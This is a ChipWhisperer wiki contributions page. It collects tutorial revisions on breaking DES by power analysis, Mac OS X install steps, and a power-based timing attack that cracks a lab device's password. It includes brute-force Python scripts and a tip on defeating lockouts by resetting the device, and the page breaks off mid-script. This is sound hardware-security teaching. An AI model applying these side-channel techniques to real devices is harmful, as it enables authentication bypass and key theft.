ChipWhisperer Wiki - User contributions [en]

V3:Tutorial B5-2 Breaking DES (Straightforward)

2017-12-04T22:54:04Z

DavidRysk:

{{Infobox tutorial
|name = B5-2: Breaking DES (Straightforward)
|image =
|caption =
|software versions =
|capture hardware = CW-Lite, CW-Lite 2-Part, CW-Pro
|Target Device =
|Target Architecture = XMEGA
|Hardware Crypto = No
|Purchase Hardware =
}}

Follow the same procedure as in : [[Tutorial B5 Breaking AES (Straightforward)]], but:
* Flashing the DES firmware to the target device (e.g. chipwhisperer/hardware/victims/firmware/simpleserial-des/simpleserial-des-xmega.hex), instead;

and:
* Setting an appropriate 'Total Samples' (e.g. 3500) and 'Offset' (e.g. 15500) in the ''Scope Settings'';
* Setting the 'Key Length (Bytes)', 'Input Length (Bytes)' and 'Output Length (Bytes)' to 8 bytes in the ''Target Settings'';
* Setting an appropriate 8 bytes Key in the ''Generic Settings (e.g. 2B 7E 15 16 28 AE D2 A6)''.

* Or, alternatively, execute the script "ChipWhisperer-Lite: DES SimpleSerial on XMEGA" to do the above steps automatically in this platform.

In the Analyzer, the only difference is to set the 'Crypto Algorithm' to DES in the ''Attack Settings''.

[[File:breaking_des.png|896x896px]]

Note that the attack attemps to recover the [[wikipedia:File:DES-key-schedule.png|first round key]], which only has 48bits ([[wikipedia:File:DES-f-function.png|8 s-boxes x 6 bits each]]), while the original key has 56 significative bits (64 if we count the parity bits that are irrelevant). So, if we map the first round key, obtained after the attack, to the original key (you can use the provided DES Key Schedule Tool to do it), there will still be 8 bits missing (256 combinations).

[[File:deskeyschedulecalc.png]]

In this example, it matches the original key that was:

[[File:key_des.png|801x801px]]

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B5-2 Breaking DES (Straightforward)

2017-12-04T22:53:51Z

DavidRysk:

{{Warningbox|This tutorial has been updated for ChipWhisperer 4.0.0 release. If you are using 3.x.x see the "V3" link in the sidebar.}}

{{Infobox tutorial
|name = B5-2: Breaking DES (Straightforward)
|image =
|caption =
|software versions =
|capture hardware = CW-Lite, CW-Lite 2-Part, CW-Pro
|Target Device =
|Target Architecture = XMEGA
|Hardware Crypto = No
|Purchase Hardware =
}}

Follow the same procedure as in : [[Tutorial B5 Breaking AES (Straightforward)]], but:
# Flashing the DES firmware to the target device (e.g. chipwhisperer/hardware/victims/firmware/simpleserial-des/simpleserial-des-xmega.hex), instead;
# Setting an appropriate 'Total Samples' (e.g. 3500) and 'Offset' (e.g. 15500) in the ''Scope Settings'';
# Setting the 'Key Length (Bytes)', 'Input Length (Bytes)' and 'Output Length (Bytes)' to 8 bytes in the ''Target Settings'';
# Setting an appropriate 8 bytes Key in the ''Generic Settings (e.g. 2B 7E 15 16 28 AE D2 A6)''.

* Or, alternatively, execute the script "setup_cwlite_xmega_des.py" to perform steps 2-4 (you still need to perform step 1 yourself).

In the Analyzer, you'll need to modify the script to call the DES model instead of the AES model. This will mean:

<pre>
from chipwhisperer.analyzer.attacks.models.DES import DES, SBox_output
</pre>

And setting:

<pre>
leak_model = DES(SBox_output)
</pre>

See the example analyzer script for a complete listing of the required commands.

Note that the attack attemps to recover the [[wikipedia:File:DES-key-schedule.png|first round key]], which only has 48bits ([[wikipedia:File:DES-f-function.png|8 s-boxes x 6 bits each]]), while the original key has 56 significative bits (64 if we count the parity bits that are irrelevant). So, if we map the first round key, obtained after the attack, to the original key (you can use the provided DES Key Schedule Tool to do it), there will still be 8 bits missing (256 combinations).

[[File:deskeyschedulecalc.png]]

In this example, it matches the original key that was:

[[File:key_des.png|801x801px]]

{{Template:Tutorials}}
[[Category:Tutorials]]

Installing ChipWhisperer/Required Tools - Mac OS X

2017-11-23T03:32:17Z

DavidRysk: add libusb to requirements

<h2> Python </h2>
The following have been tested on Mac OS X Yosemite (10.10) - earlier versions may not have a recent enough Python installation (recommended 2.7.6 or later). It's possible to install other Python versions on your Mac OS X via the 'homebrew' system, we will use this for installing a few additional required tools.

<ol style="list-style-type: decimal;">
<li>Ensure your user account has a password. In order for the 'sudo' command to work it requires you to type your password, so if you don't have one enabled be sure to set a temporary password now.</li>
<li>Install the 'homebrew' system, see [http://brew.sh brew.sh] for details. Briefly, you can install it by pasting the following in a terminal:
<pre>$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"</pre></li>
<li>As PySide is based on Qt 4, which is not officially supported by Homebrew, you will need to load the [https://github.com/cartr/homebrew-qt4 homebrew-qt4 tap]:
<pre>$ brew tap cartr/qt4</pre></li>
<li>Install PySide using homebrew:
<pre>$ brew install pyside</pre>
The install will probably print a message like this:
<blockquote>[[File:Install_macosx_brewpath.png|image]]</blockquote>
Note you must run that command in order to successfully import the modules, in this example it would be:
<pre>$ mkdir -p /Users/macmini/Library/Python/2.7/lib/python/site-packages
$ echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/macmini/Library/Python/2.7/lib/python/site-packages/homebrew.pth</pre></li></ol>

<h2> SciPy </h2>
You may need to upgrade your SciPy from the base install if you wish to do template attacks. This is not needed for other attacks, so please only proceed with the following if you receive an error that your version of scipy is too old.

The easiest method is to use brew again:

brew install scipy

You will also need to follow the instructions as above (inserting the link to the brew site-packages location). You will finally need to run the following:

brew link --overwrite numpy

<h2> libusb </h2>
libusb is needed for the ChipWhisperer software to communicate with the board.

Again, use brew:

brew install libusb

<h2> AVR-GCC </h2>

You can easily use brew to install avr-gcc, as decribed at [https://github.com/osx-cross/homebrew-avr/ OSX-Cross Project]:

$ brew tap osx-cross/avr

$ brew install avr-gcc

Installing ChipWhisperer/Required Tools - Mac OS X

2017-10-26T01:17:58Z

DavidRysk: avr-libc formula no longer exists, one can just install avr-gcc directly.

<h2> Python </h2>
The following have been tested on Mac OS X Yosemite (10.10) - earlier versions may not have a recent enough Python installation (recommended 2.7.6 or later). It's possible to install other Python versions on your Mac OS X via the 'homebrew' system, we will use this for installing a few additional required tools.

<ol style="list-style-type: decimal;">
<li>Ensure your user account has a password. In order for the 'sudo' command to work it requires you to type your password, so if you don't have one enabled be sure to set a temporary password now.</li>
<li>Install the 'homebrew' system, see [http://brew.sh brew.sh] for details. Briefly, you can install it by pasting the following in a terminal:
<pre>$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"</pre></li>
<li>As PySide is based on Qt 4, which is not officially supported by Homebrew, you will need to load the [https://github.com/cartr/homebrew-qt4 homebrew-qt4 tap]:
<pre>$ brew tap cartr/qt4</pre></li>
<li>Install PySide using homebrew:
<pre>$ brew install pyside</pre>
The install will probably print a message like this:
<blockquote>[[File:Install_macosx_brewpath.png|image]]</blockquote>
Note you must run that command in order to successfully import the modules, in this example it would be:
<pre>$ mkdir -p /Users/macmini/Library/Python/2.7/lib/python/site-packages
$ echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/macmini/Library/Python/2.7/lib/python/site-packages/homebrew.pth</pre></li></ol>

<h2> SciPy </h2>
You may need to upgrade your SciPy from the base install if you wish to do template attacks. This is not needed for other attacks, so please only proceed with the following if you receive an error that your version of scipy is too old.

The easiest method is to use brew again:

brew install scipy

You will also need to follow the instructions as above (inserting the link to the brew site-packages location). You will finally need to run the following:

brew link --overwrite numpy

<h2> AVR-GCC </h2>

You can easily use brew to install avr-gcc, as decribed at [https://github.com/osx-cross/homebrew-avr/ OSX-Cross Project]:

$ brew tap osx-cross/avr

$ brew install avr-gcc

Installing ChipWhisperer/Required Tools - Mac OS X

2017-08-01T01:31:55Z

DavidRysk: Add homebrew-qt4 tap step

<h2> Python </h2>
The following have been tested on Mac OS X Yosemite (10.10) - earlier versions may not have a recent enough Python installation (recommended 2.7.6 or later). It's possible to install other Python versions on your Mac OS X via the 'homebrew' system, we will use this for installing a few additional required tools.

<ol style="list-style-type: decimal;">
<li>Ensure your user account has a password. In order for the 'sudo' command to work it requires you to type your password, so if you don't have one enabled be sure to set a temporary password now.</li>
<li>Install the 'homebrew' system, see [http://brew.sh brew.sh] for details. Briefly, you can install it by pasting the following in a terminal:
<pre>$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"</pre></li>
<li>As PySide is based on Qt 4, which is not officially supported by Homebrew, you will need to load the [https://github.com/cartr/homebrew-qt4 homebrew-qt4 tap]:
<pre>$ brew tap cartr/qt4</pre></li>
<li>Install PySide using homebrew:
<pre>$ brew install pyside</pre>
The install will probably print a message like this:
<blockquote>[[File:Install_macosx_brewpath.png|image]]</blockquote>
Note you must run that command in order to successfully import the modules, in this example it would be:
<pre>$ mkdir -p /Users/macmini/Library/Python/2.7/lib/python/site-packages
$ echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/macmini/Library/Python/2.7/lib/python/site-packages/homebrew.pth</pre></li></ol>

<h2> SciPy </h2>
You may need to upgrade your SciPy from the base install if you wish to do template attacks. This is not needed for other attacks, so please only proceed with the following if you receive an error that your version of scipy is too old.

The easiest method is to use brew again:

brew install scipy

You will also need to follow the instructions as above (inserting the link to the brew site-packages location). You will finally need to run the following:

brew link --overwrite numpy

<h2> AVR-GCC </h2>

You can easily use brew to install avr-gcc, as decribed at [https://github.com/osx-cross/homebrew-avr/ OSX-Cross Project]:

$ brew tap osx-cross/avr

$ brew install avr-libc

Installing ChipWhisperer

2017-08-01T01:24:36Z

DavidRysk: Remove duplicate section

This page describes how to install the ChipWhisperer software.

There are five ways to set up ChipWhisperer:
* '''VMWare Virtual Machine:''' Get a pre-prepared virtual machine image with all of the required tools already installed. ''Recommended for beginners.''
* '''Windows Installer''' Get a Windows binary that installs the ChipWhisperer repository to your computer. Does not include WinAVR compiler.
* '''ChipWhisperer Releases:''' Get a zip file with the latest stable ChipWhisperer code and run it on your own environment.
* '''PyPi Package:''' <code>pip install chipwhisperer</code>. Only includes the software - doesn't come with the hardware source files, drivers, or example firmware.
* '''Git Repository:''' Get the latest, bleeding-edge features and bugs. Recommended if you're an experienced developer and you want to contribute to ChipWhisperer.

{{TOC|limit=3}}

{{CollapsibleSection
|intro = = Using VMWare Virtual Machine =
|content= Installing ChipWhisperer/Using VMWare Virtual Machine}}

{{CollapsibleSection
|intro = = Automatic Windows Installer =
|content= Installing ChipWhisperer/Windows Installer}}

{{CollapsibleSection
|intro= = Manual Install - Windows =
|content= Installing ChipWhisperer/Required Tools - Windows}}

{{CollapsibleSection
|intro= = Manual Install - Linux =
|content= Installing ChipWhisperer/Required Tools - Linux}}

{{CollapsibleSection
|intro= = Manual Install - Mac OS X =
|content= Installing ChipWhisperer/Required Tools - Mac OS X}}

{{CollapsibleSection
|intro= = Installing ChipWhisperer from Releases =
|content= Installing ChipWhisperer/Installing ChipWhisperer from Releases}}

{{CollapsibleSection
|intro= = Installing ChipWhisperer from PyPi =
|content= Installing ChipWhisperer/Installing ChipWhisperer from PyPi}}

{{CollapsibleSection
|intro= = Installing ChipWhisperer from Git =
|content= Installing ChipWhisperer/Installing ChipWhisperer from Git}}

{{CollapsibleSection
|intro= = Quick Tests =
|content= Installing ChipWhisperer/Quick Tests}}

[[Category:Introduction]]

Tutorial B3-1 Timing Analysis with Power for Password Bypass

2017-07-22T00:02:33Z

DavidRysk: Note output of print

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

In addition this example shows you how to drive the ChipWhisperer software with a script, rather than using the GUI. This will be required when attacking new devices which you have not yet added to the core ChipWhisperer software.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

You can also view a 53-min [https://www.youtube.com/watch?v=h4eAU6vEONs&hd=1 Video Version on YouTube]:

= Prerequisites =

You should have already completed [[Tutorial B2 Viewing Instruction Power Differences]] to gain a better understanding of the ChipWhisperer interface.

= Building the Target Firmware =

The target firmware is located in the directory <code>chipwhisperer\hardware\victims\firmware\basic-passwdcheck</code>. Build the firmware using <code>make</code>, once again being careful to ensure you are using the correct <code>PLATFORM=</code> command. You should end up with something like this being printed:

<pre>Creating Symbol Table: basic-passwdcheck.sym
avr-nm -n basic-passwdcheck.elf > basic-passwdcheck.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 5400 bytes (3.9% Full)
(.text + .data + .bootloader)

Data: 524 bytes (6.4% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre>

= Manual Communications with the Target =

At this point, you should be able to configure the target as in the previous tutorials. Rather than tediously going through the setup process again, we'll simply use one of the scripts built into the ChipWhisperer-Capture software. This will demonstrate how we can use a script as a starting point to simplify our setup.

<ol style="list-style-type: decimal;">
<li>Connect your target hardware (ChipWhisperer-Lite/Pro or ChipWhisperer-Capture Rev 2 with target board).</li>
<li>Open the ChipWhisperer-Capture software.</li>
<li>From the ''Example Scripts'', select one which most closely matches your hardware. For example here I'm using a ChipWhisperer-Lite with the XMEGA target, so will select the "ChipWhisperer-Lite: AES SimpleSerial on XMEGA" script. Note I'm ''NOT'' attacking AES, so will need to make some adjustments later. (The "Timing Attack on CW-Lite (XMEGA)" script already does most of this for us, so using it would defeat the purpose of this tutorial.)</li>
<li>The system should connect to your hardware. Remember you have not yet reprogrammed the target so won't be communicating with the target program.</li>
<li>Using the programming tool (such as XMEGA programming dialog), program the file <code>basic-passwdcheck.hex</code> into the target device. This file is located where you ran <code>make</code> previously.</li>
<li>Select ''Tools --> Terminal'', and press ''Connect''. You should see a window such as this:
<blockquote>[[File:Termconn.png|image]]</blockquote></li>
<li>At this point we need to reset the target device. The easiest way to do this is use the programmer interface, and press the ''Check Signature'' or ''Read Signature'' button. This will reset the target device as part of the signature read operation. You should see some messages come across the terminal emulator window:
<blockquote>[[File:Checksig_print.png|image]]</blockquote>
<dl>
<dt>Note a few warnings about the terminal emulator:</dt>
<dd><ul>
<li>The on-board buffer is fairly small, and can be easily overflowed. You may notice a few longer lines become trunicated if printing is too fast!</li>
<li>You can uncheck the "Show non-ASCII as hex" to avoid having the <code>0a</code> printed in red. The <code>0a</code> is the hex character for a newline. Many protocols use non-ASCII characters, so to help with debugging it is left enabled by default.</li></ul>
</dd></dl>
</li>
<li>We've now got some super-secure system! Let's begin with some exploratory tests - in this case I happened to know the correct password is <code>h0px3</code>.
<blockquote>'''tip'''
In real systems, you may often know ''one'' of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilites. So the assumption that we have access to the password is really just saying we have access to ''a'' password, and will use that knowledge to break the system in general.</blockquote></li>
<li>Using the terminal emulator, write the correct password in, and press <code><enter></code>. You should be greeted by a welcome message, and if using the CW-Lite XMEGA target the green LED will illuminate:
[[File:Passok.png|image]]</li>
<li>The system enters an infinite loop for any password entry. Thus you must reset the system, use the ''Programmer Window'' to again perform a ''Check Signature'' or ''Read Signature'' operation.</li>
<li>Enter an incorrect password - notice a different message is printed, and if using the CW-Lite XMEGA target the red LED will come on.</li></ol>

= Recording Power Traces =
Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll get the power measurements to trigger after we send our password to the target.

<ol style="list-style-type: decimal;">
<li>We'll make some changes to the trigger setup of the ChipWhisperer (on the ''Scope Settings'' tab). In particular, ensure you set the following:
<blockquote><ul>
<li>Offset = 0</li>
<li>Timeout set to 5 seconds or greater (to give yourself time when manually testing)</li></ul>

[[File:Timeout_offset.png|image]]</blockquote></li>
<li>Change to the ''Target Settings'' tab, and delete the ''Command'' strings. Those strings are used in the AES attack to send a specific command to the target device. For now we will be manually sending data:
<blockquote>[[File:Text_targetsettings.png|image]]</blockquote></li>
<li>Still in the ''Target Settings'' tab, under ''Protocol Version'', change ''Version'' from ''Auto'' to ''1.0''
<li>Perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Enter the password <code>h0px3</code> in the terminal window, but ''do not'' yet hit enter.</li>
<li>Press the ''Capture 1'' button, and immediately switch to the terminal emulator window and press <code><enter></code> to send the password.</li></ol>
</blockquote>
You must send the password before the timeout occurs -- you can increase the length of the timeout if needed to give yourself more time! If this works you should see the power consumption displayed in the GUI:
<blockquote>[[File:Trace_manual_pass.png|image]]</blockquote></li>

<li>Rather than using the manual terminal, let's now use the GUI to automatically send a password try. Switching back to the ''Target Settings'' tab, write <code>h0px3\n</code> into the ''Go Command'' option:
<blockquote>[[File:Gocorrect.png|image]]</blockquote>
The ''Go Command'' is sent right after the scope is armed. In this example it means we can capture the power consumption during the password entry phase.</li>
<li>Now perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Press the ''Capture 1'' button.</li></ol>
</blockquote>
Hopefully this resulted in the same waveform as before! Note the device takes around 1 second to 'boot', so if you are too lightning fast after resetting the device it won't actually be ready to accept the password. You can keep the terminal emulator window open to view the output data.</li>
<li>Play around with the password entered on the ''Go Command'' - try all of the following:
<ul>
<li><code>h0px3\n</code></li>
<li><code>h0px4\n</code></li>
<li><code>h0paa\n</code></li>
<li><code>haaaa\n</code></li>
<li><code>a\n</code></li></ul>

You should notice a distinct change in the password depending how many characters were correct. For example the following shows the difference between passwords of <code>h0px4</code> (which has 4 correct characters) and <code>h0paa</code> (which has 3 correct characters):
<blockquote>[[File:3vs4.png|image]]</blockquote></li></ol>

= Automatic Resets =
The last step before scripting an entire attack is to figure out how to automatically reset the target device before (or after) each capture. There are two ways to do this, and the following steps take you through two examples of how to accomplish this goal.

== Reset via Spare IO Lines ==

TODO - see reset via programming interface for now

== Reset via Auxiliary Module ==

Auxiliary modules are small pieces of code that can perform some extra functions during the capture process. The functions inside these Python modules are run before a capture, before the power measurement is armed, before the measurement is triggered, after a single trace is completed, and after an entire capture is finished. We will use an existing auxiliary module to reset the target chip before arming the measurement so that we don't have to manually reset the device.

<ol style="list-style-type: decimal;">
<li> We're going to use the ''Reset AVR/XMEGA via CW-Lite'' auxiliary module. Let's get an idea of how this module works:
* Navigate to the auxiliary modules folder (<code>chipwhisperer\software\chipwhisperer\capture\auxiliary\</code>) and open <code>ResetCW1183Read.py</code> in your choice of text editor.
* Find the function definition for <code>resetDevice()</code>. It contains a line that looks like:
<pre>
CWCoreAPI.getInstance().getScope().scopetype.cwliteXMEGA.readSignature()
</pre>
* Look for the lines where this function gets called. You'll find that the function <code>traceArm()</code> uses it like:
<pre>
resettiming = self.findParam('resettiming').value()
if resettiming == 'Pre-Arm':
self.resetDevice()
</pre>
Effectively, this code will read the target's signature before we arm the power measurement. This means that the target will automatically be reset before capturing a power trace.
</li>

<li> Go back to the ChipWhisperer Capture software. In the ''Generic Settings'' tab, switch the Auxiliary Module to ''Reset AVR/XMEGA via CW-Lite''.
</li>
<li> Now, in the ''Aux Settings'' tab, we can configure our automatic reset. Make sure the settings are:
* Pre-arm delay: roughly 1200 ms
* Post-arm delay: the default (0 ms) is fine
* Reset timing: Pre-arm (reset the device before we arm the scope)
</li>
<li> Press ''Capture 1''. The target will automatically reset, with the Safe-o-matic 3000 boot sequence appearing in the console. Then, 1 second later, the program will send the password to the target and record a power trace.
</li>
</ol>

Now, confirm that you can try different passwords (in ''Target Settings'') and see how the power trace changes when your password has 0, 1, 2... correct characters.

= Performing the Timing Attack =
So far, we've set up our ChipWhisperer to automatically reset the target, send it a password attempt of our choice, and record a power trace while the target processes the password. Now, we'll write a Python script to automatically try different passwords and use these power traces to discover the password stored on the target.

== Scripting the Setup ==
Our first step will be to write a script that automatically sets up the ChipWhisperer Capture software with all of the settings we've tested above. We'll do this by modifying an existing script with our own settings.

<ol style="list-style-type: decimal;">
<li>Make a copy of an existing ChipWhisperer script. The example scripts are located at <code>chipwhisperer\software\chipwhisperer\capture\scripts</code>; for example, the default one for the XMEGA device is called <code>cwlite-simpleserialxmega.py</code>. Make a copy of this script and put it somewhere memorable.
</li>
<li>Rename the script something else - for example, <code>cwlite-passwordcrack.py</code> - and open it for editing. You'll notice that a large chunk of the code is used to set the parameters:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['CW Extra', 'CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Trigger Setup', 'Total Samples', 3000],
['OpenADC', 'Trigger Setup', 'Offset', 1500],
['OpenADC', 'Gain Setting', 'Setting', 45],
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
]</pre>
Those parameters come from the ''Scripting Parameters'' tab. Switch over to it and notice this tab logs all of the parameter changes, showing you how to change the parameters through the API:
<blockquote>[[File:Scriptcommands.png|image]]</blockquote>
Note that commands run via the script are also printed, so you can see where the values being set are coming from too. 
</li>

<li>At this point, close the ''ChipWhisperer-Capture'' window so we can confirm the script still works. Run the new script (which doesn't have any changes yet) from the command line. You may have to open a console with Python in the path:
<blockquote><ol style="list-style-type: lower-roman;">
<li>If you installed WinPython, run the ''WinPython Console'' from your WinPython installation directory.</li>
<li>If using the VMWare image of a Linux machine, this should just be a regular console</li></ol>
</blockquote></li></ol>
<blockquote>Run the script with <code>python cwlite-passwordcrack.py</code>. If the script errors out, it might be that the location of the FPGA bitstream is stored in relative terms. To fix this perform the following:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Open ChipWhisperer-Capture regularly.</li>
<li>Run the ChipWhisperer script that you used previously.</li>
<li>Select ''Tools-->Config CW Firmware''</li>
<li>Under the "FPGA .zip (Release)", hit the "Find" button. Point the system to the file <code>chipwhisperer/hardware/capture/chipwhisperer-lite/cwlite_firmware.zip</code> on your filesystem. Note by default there is a relative path.</li></ol>
</blockquote></blockquote>

<ol start="4" style="list-style-type: decimal;">
<li>Once again on the ''Target Settings'' tab, delete the various commands. Make a note of the resulting ''Script Commands'' which you will need to enter to achieve this same goal. Close ChipWhisperer-Capture.</li>
<li>Continue editing your script. First, find the line setting the Trigger Offset:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 1500],</pre>
And set this to 0, which we were using previously:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 0],</pre></li>
<li>Next, append the required commands to clear the simpleserial commands and to enable the automatic resets:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
...BUNCH MORE COMMANDS HERE HAVE BEEN REMOVED...
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],

#Append your commands here
['Simple Serial', 'Load Key Command', u''],
['Simple Serial', 'Go Command', u''],
['Simple Serial', 'Output Format', u''],

['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]</pre></li>

<li>Finally, we will set the password. You can enter the password in the Capture ''Target Settings'' tab, and see the following sort of call would set the appropriate password:
<pre>self.api.setParameter(['Simple Serial', 'Go Command', u'h0px3\\n'])</pre>
Note the newline is actually escaped, to set the text equivalent of what will be printed. This will result in an actual newline going out across the serial port. Set that command at some point in your script.
<li>Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press ''Capture 1'' and see the correct waveform.</li>
</ol>

== Running a Single Capture ==
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.

The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here:
* <code> self.api.capture1()</code> acts as if we've just pressed the ''Capture 1'' button;
* <code> self.api.getScope().channels[0].getTrace()</code> returns a list of datapoints that were recorded in the previous capture.
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<pre>
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data
</pre>
Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand datapoints. (Note that output of <code>print</code> statements may go to the ''Debug Logging'' tab in the GUI.) This is all we need to continue.

== Attacking a Single Letter ==
Now that we can record one power trace, we can start the timing attack. Our goal here is to automatically find the first letter of the Super Secret (tm) password.

<li>Look at this example of the power traces when 0 and 1 bytes are correct. We can see a clear point that appears to shift forward in time:
<blockquote>[[File:Passwordcrackerpts.png|image]]</blockquote>
When we guess the first byte incorrectly, there is a distinct power spike at sample number 153. However, when we guess correctly, the target spends more time processing the password, and this spike moves 72 samples forward. This means that we can check if our first byte is correct by checking this data point: if we're right, it will have an amplitude greater than -0.2. Note the specific point will change for different hardware, and may also change if you use different versions of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.</li>

<li> Add a loop to your script that does the following:
* Sets the ''Go Command'' to the next character we want to try
* Captures a power trace
* Checks if sample 153 is above -0.2 (fill in the appropriate numbers here)
* Repeats for all characters we want to try
An example of this loop is:
<pre>
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for c in trylist:
# Test this password and record a power trace
self.api.setParameter(['Simple Serial', 'Go Command', c + '\n'])
self.api.capture1()

# Get the data and check data[153]
data = self.api.getScope().channels[0].getTrace()
if data[153] > -0.2:
print "Success: " + c
</pre>
This script will eventually stop, but you can use Ctrl+C on the command line to kill it. Make sure your script prints "Success: h"!
</li>

== Attacking the Full Password ==
The last step is to attack the entire password, one letter at a time. The procedure to do this is:
* Start with a blank password string
* Loop through all of the characters we want to try:
** Add the next character to the end of the password
** Test this new candidate password using code similar to the above
** If the new password is correct up to character (1, 2, ..., 5), add it to the end of the password
* Repeat until we've cracked all 5 characters.

Note that the point of interest is no longer at sample 153. We noticed earlier that this key point moves 72 samples forward for every correct character, so we'll have to check location <code>153</code> for character 0, <code>153 + 72</code> for character 1, and <code>153 + i*72</code> for character <code>i</code>.

An example of this loop is:
<pre>
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>
After some time, this prints <code>5 characters: h0px3</code> -- it automatically finds the correct password.

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

= Conclusion =

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken. In addition you have learned about the scripting support in the ChipWhisperer-Capture software.

= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<pre>
def run(self):
# This is the function that gets called when our script starts

# First: set up the basics and connect to the CW-Lite
self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native'])
self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite'])
self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite'])
self.api.connect()

# Next: set up everything we need to connect to the target
# Put all of our commands in a list and execute them at the end
lstexample = [
# Gain
['OpenADC', 'Gain Setting', 'Setting', 45],
# Trigger
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
['OpenADC', 'Trigger Setup', 'Offset', 0],
['OpenADC', 'Trigger Setup', 'Total Samples', 2000],
# Clock
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
# Pins
['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
# Automatic commands
['Simple Serial', 'Load Key Command', ''],
['Simple Serial', 'Go Command', 'h0px3\n'],
['Simple Serial', 'Output Format', ''],
# Auto-reset
['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]

#Download all hardware setup parameters
for cmd in lstexample:
self.api.setParameter(cmd)

# Get one capture for fun
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data

# Crack the first letter
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
